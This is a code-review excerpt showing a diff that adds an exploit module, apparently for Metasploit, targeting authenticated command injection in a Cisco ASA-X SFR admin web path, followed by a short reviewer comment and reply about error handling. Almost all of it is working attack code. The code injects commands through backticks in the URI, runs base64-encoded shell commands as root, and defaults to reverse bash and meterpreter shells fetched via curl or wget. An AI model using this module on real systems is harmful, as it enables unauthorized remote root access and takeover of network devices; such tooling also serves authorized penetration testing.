modules/exploits/linux/http/cisco_asax_sfr_rce.rb

```diff
@@ -0,0 +1,149 @@
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'cisco']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'labpass1']),
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'),
+      'headers' =>
+      {
+        'User-Agent' => 'ASDM/ Java/1',
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    })
+    return CheckCode::Unknown('The target did not respond to the check.') unless res
+    return CheckCode::Safe('Authentication failed.') if res.code == 401
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+
+    if res.body.include?('Invalid do command uid=0(root)')
+      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
+    end
+
+    CheckCode::Safe('The command injection does not appear to work.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    # base64 encode the payload to work around bad characters and then uri encode
+    # the whole thing before yeeting it at the server
+    encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"),
+      'headers' =>
+      {
+        'User-Agent' => 'ASDM/ Java/1',
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    })
+    return CheckCode::Unknown('The target did not respond to the check.') unless res
+    return CheckCode::Unknown('Authentication failed.') if res.code == 401
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
```

Comment:
Since `execute_command` is not called in the `check` method prefer `fail_with` to bail execution early.

Reply:
Yeah, this was... very special of me. I'm on it!